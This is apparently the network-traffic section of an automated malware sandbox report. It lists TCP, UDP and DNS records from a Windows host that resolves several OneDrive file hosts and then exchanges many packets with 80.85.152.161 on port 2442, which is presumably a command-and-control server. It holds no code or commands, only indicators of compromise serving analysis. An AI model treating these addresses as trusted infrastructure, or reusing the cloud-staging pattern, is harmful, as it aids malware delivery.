Apr 19, 2024 16:17:45.609751940 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.610150099 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.610213995 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.610513926 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.610580921 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.665594101 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.665800095 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.665970087 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.666481972 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.667686939 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.667857885 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.669620037 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.671061993 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.850056887 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.850153923 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.851238012 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.852001905 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.852683067 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.853370905 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.854062080 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.854768991 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.855356932 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.856123924 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.856823921 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.857539892 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.858273029 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.860502958 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.860534906 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.860564947 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.860599041 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.863106966 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.863888979 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.864176989 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.864207983 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.864238977 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.864269972 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.864788055 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.865583897 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.865845919 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.866867065 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.911575079 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.911673069 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.912451982 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:46.047348022 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:46.250910044 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:46.496627092 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:46.718940973 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:46.903728962 CEST	49184	443	192.168.2.22	150.171.41.11
Apr 19, 2024 16:17:46.903776884 CEST	443	49184	150.171.41.11	192.168.2.22
Apr 19, 2024 16:17:46.903841972 CEST	49184	443	192.168.2.22	150.171.41.11
Apr 19, 2024 16:17:46.905455112 CEST	49184	443	192.168.2.22	150.171.41.11
Apr 19, 2024 16:17:46.905474901 CEST	443	49184	150.171.41.11	192.168.2.22
Apr 19, 2024 16:17:47.279915094 CEST	443	49184	150.171.41.11	192.168.2.22
Apr 19, 2024 16:17:47.280114889 CEST	49184	443	192.168.2.22	150.171.41.11
Apr 19, 2024 16:17:47.284181118 CEST	49184	443	192.168.2.22	150.171.41.11
Apr 19, 2024 16:17:47.284193039 CEST	443	49184	150.171.41.11	192.168.2.22
Apr 19, 2024 16:17:47.284567118 CEST	443	49184	150.171.41.11	192.168.2.22
Apr 19, 2024 16:17:47.335532904 CEST	49184	443	192.168.2.22	150.171.41.11
Apr 19, 2024 16:17:47.376147032 CEST	443	49184	150.171.41.11	192.168.2.22
Apr 19, 2024 16:17:48.188142061 CEST	443	49184	150.171.41.11	192.168.2.22
Apr 19, 2024 16:17:48.188270092 CEST	443	49184	150.171.41.11	192.168.2.22
Apr 19, 2024 16:17:48.188316107 CEST	49184	443	192.168.2.22	150.171.41.11
Apr 19, 2024 16:17:48.322602987 CEST	49184	443	192.168.2.22	150.171.41.11
Apr 19, 2024 16:17:48.941292048 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:49.187086105 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:49.187271118 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:49.187323093 CEST	49183	2442	192.168.2.22	80.85.152.161

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2024 16:16:42.954482079 CEST	60507	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:43.399663925 CEST	50446	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:44.822067022 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:45.154577971 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:45.262969971 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:45.372275114 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:45.530738115 CEST	55939	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:45.713149071 CEST	49608	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:45.970340014 CEST	49608	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:46.081866980 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:46.187068939 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:46.292206049 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:46.524271011 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:46.629687071 CEST	61486	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:47.820249081 CEST	62453	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:48.046762943 CEST	62453	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:48.152189016 CEST	62453	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:48.310214043 CEST	62453	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:48.611421108 CEST	50568	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:48.728960991 CEST	50568	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:16:48.834635973 CEST	50568	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:00.385827065 CEST	61467	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:00.492229939 CEST	53	61467	8.8.8.8	192.168.2.22
Apr 19, 2024 16:17:00.492476940 CEST	61467	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:00.597832918 CEST	53	61467	8.8.8.8	192.168.2.22
Apr 19, 2024 16:17:06.044245958 CEST	61618	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:06.669373035 CEST	54422	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:08.817966938 CEST	52074	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:08.923708916 CEST	52074	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:09.442950964 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:09.616914988 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:10.036734104 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:10.276607990 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:10.384351015 CEST	50337	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:15.113112926 CEST	61826	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:15.442236900 CEST	56329	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:16.700238943 CEST	63469	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:16.785896063 CEST	59447	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:16.811804056 CEST	51828	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:16.957478046 CEST	53406	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:18.315023899 CEST	56345	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:18.436022997 CEST	56345	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:18.559931040 CEST	56345	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:18.670434952 CEST	56345	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:18.785351992 CEST	51870	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:18.906725883 CEST	51870	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:19.029267073 CEST	51870	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:20.440167904 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:20.561587095 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:20.755750895 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:20.945257902 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:21.164099932 CEST	65009	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:29.107588053 CEST	64956	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:29.212724924 CEST	53	64956	8.8.8.8	192.168.2.22
Apr 19, 2024 16:17:29.213006020 CEST	64956	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:29.317672014 CEST	53	64956	8.8.8.8	192.168.2.22
Apr 19, 2024 16:17:29.317933083 CEST	64956	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:29.423091888 CEST	53	64956	8.8.8.8	192.168.2.22
Apr 19, 2024 16:17:29.423310041 CEST	64956	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:29.528367996 CEST	53	64956	8.8.8.8	192.168.2.22
Apr 19, 2024 16:17:46.623644114 CEST	54521	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:46.794909000 CEST	49750	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:48.363692999 CEST	64687	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:48.500835896 CEST	64687	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:48.622031927 CEST	64687	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:48.728241920 CEST	64687	53	192.168.2.22	8.8.8.8
Apr 19, 2024 16:17:48.833736897 CEST	64687	53	192.168.2.22	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 19, 2024 16:16:42.954482079 CEST	192.168.2.22	8.8.8.8	0xac83	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:43.399663925 CEST	192.168.2.22	8.8.8.8	0xeefa	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:44.822067022 CEST	192.168.2.22	8.8.8.8	0x7abd	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:45.154577971 CEST	192.168.2.22	8.8.8.8	0x7abd	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:45.262969971 CEST	192.168.2.22	8.8.8.8	0x7abd	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:45.372275114 CEST	192.168.2.22	8.8.8.8	0x7abd	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:45.530738115 CEST	192.168.2.22	8.8.8.8	0x7abd	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:45.713149071 CEST	192.168.2.22	8.8.8.8	0xfe0f	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:45.970340014 CEST	192.168.2.22	8.8.8.8	0xfe0f	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.081866980 CEST	192.168.2.22	8.8.8.8	0xbea2	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.187068939 CEST	192.168.2.22	8.8.8.8	0xbea2	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.292206049 CEST	192.168.2.22	8.8.8.8	0xbea2	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.524271011 CEST	192.168.2.22	8.8.8.8	0xbea2	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.629687071 CEST	192.168.2.22	8.8.8.8	0xbea2	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:47.820249081 CEST	192.168.2.22	8.8.8.8	0x9ede	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:48.046762943 CEST	192.168.2.22	8.8.8.8	0x9ede	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:48.152189016 CEST	192.168.2.22	8.8.8.8	0x9ede	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:48.310214043 CEST	192.168.2.22	8.8.8.8	0x9ede	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:48.611421108 CEST	192.168.2.22	8.8.8.8	0xf7c2	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:48.728960991 CEST	192.168.2.22	8.8.8.8	0xf7c2	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:48.834635973 CEST	192.168.2.22	8.8.8.8	0xf7c2	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:00.385827065 CEST	192.168.2.22	8.8.8.8	0xa0c2	Standard query (0)	63.155.11.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:00.492476940 CEST	192.168.2.22	8.8.8.8	0xa0c2	Standard query (0)	63.155.11.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:06.044245958 CEST	192.168.2.22	8.8.8.8	0x67c2	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:06.669373035 CEST	192.168.2.22	8.8.8.8	0x959b	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:08.817966938 CEST	192.168.2.22	8.8.8.8	0xc94c	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:08.923708916 CEST	192.168.2.22	8.8.8.8	0xc94c	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:09.442950964 CEST	192.168.2.22	8.8.8.8	0xd292	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:09.616914988 CEST	192.168.2.22	8.8.8.8	0xd292	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:10.036734104 CEST	192.168.2.22	8.8.8.8	0xd292	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:10.276607990 CEST	192.168.2.22	8.8.8.8	0xd292	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:10.384351015 CEST	192.168.2.22	8.8.8.8	0xd292	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:15.113112926 CEST	192.168.2.22	8.8.8.8	0x21d2	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:15.442236900 CEST	192.168.2.22	8.8.8.8	0xf7f6	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:16.700238943 CEST	192.168.2.22	8.8.8.8	0x4f6c	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:16.785896063 CEST	192.168.2.22	8.8.8.8	0x962a	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:16.811804056 CEST	192.168.2.22	8.8.8.8	0x9bec	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:16.957478046 CEST	192.168.2.22	8.8.8.8	0xfafa	Standard query (0)	public.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:18.315023899 CEST	192.168.2.22	8.8.8.8	0x87ed	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:18.436022997 CEST	192.168.2.22	8.8.8.8	0x87ed	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:18.559931040 CEST	192.168.2.22	8.8.8.8	0x87ed	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:18.670434952 CEST	192.168.2.22	8.8.8.8	0x87ed	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:18.785351992 CEST	192.168.2.22	8.8.8.8	0xd3e4	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:18.906725883 CEST	192.168.2.22	8.8.8.8	0xd3e4	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:19.029267073 CEST	192.168.2.22	8.8.8.8	0xd3e4	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:20.440167904 CEST	192.168.2.22	8.8.8.8	0xa82d	Standard query (0)	skydrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:20.561587095 CEST	192.168.2.22	8.8.8.8	0xa82d	Standard query (0)	skydrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:20.755750895 CEST	192.168.2.22	8.8.8.8	0xa82d	Standard query (0)	skydrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:20.945257902 CEST	192.168.2.22	8.8.8.8	0xa82d	Standard query (0)	skydrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:21.164099932 CEST	192.168.2.22	8.8.8.8	0xa82d	Standard query (0)	skydrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:29.107588053 CEST	192.168.2.22	8.8.8.8	0x1848	Standard query (0)	63.155.11.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:29.213006020 CEST	192.168.2.22	8.8.8.8	0x1848	Standard query (0)	63.155.11.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:29.317933083 CEST	192.168.2.22	8.8.8.8	0x1848	Standard query (0)	63.155.11.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:29.423310041 CEST	192.168.2.22	8.8.8.8	0x1848	Standard query (0)	63.155.11.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Apr 19, 2024 16:17:46.623644114 CEST	192.168.2.22	8.8.8.8	0xb268	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:46.794909000 CEST	192.168.2.22	8.8.8.8	0xb708	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:48.363692999 CEST	192.168.2.22	8.8.8.8	0x1981	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:48.500835896 CEST	192.168.2.22	8.8.8.8	0x1981	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:48.622031927 CEST	192.168.2.22	8.8.8.8	0x1981	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:48.728241920 CEST	192.168.2.22	8.8.8.8	0x1981	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:17:48.833736897 CEST	192.168.2.22	8.8.8.8	0x1981	Standard query (0)	utqurw.am.files.1drv.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 19, 2024 16:16:43.319372892 CEST	8.8.8.8	192.168.2.22	0xac83	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:43.319372892 CEST	8.8.8.8	192.168.2.22	0xac83	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:43.319372892 CEST	8.8.8.8	192.168.2.22	0xac83	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:43.319372892 CEST	8.8.8.8	192.168.2.22	0xac83	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:43.319372892 CEST	8.8.8.8	192.168.2.22	0xac83	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:43.504853010 CEST	8.8.8.8	192.168.2.22	0xeefa	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:43.504853010 CEST	8.8.8.8	192.168.2.22	0xeefa	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:43.504853010 CEST	8.8.8.8	192.168.2.22	0xeefa	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:43.504853010 CEST	8.8.8.8	192.168.2.22	0xeefa	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.41.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:43.504853010 CEST	8.8.8.8	192.168.2.22	0xeefa	No error (0)	dual-spov-0006.spov-dc-msedge.net		150.171.43.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:45.153152943 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.153152943 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.259771109 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.259771109 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.368146896 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.368146896 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.530430079 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.530430079 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.635808945 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	public.am.files.1drv.com	am-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.635808945 CEST	8.8.8.8	192.168.2.22	0x7abd	No error (0)	am-files.fe.1drv.com	odc-am-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.969971895 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.969971895 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.969971895 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:45.969971895 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:45.969971895 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.075197935 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.075197935 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.075197935 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.075197935 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.075197935 CEST	8.8.8.8	192.168.2.22	0xfe0f	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Apr 19, 2024 16:16:46.186805010 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.186805010 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.186805010 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 16:16:46.186805010 CEST	8.8.8.8	192.168.2.22	0xbea2	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
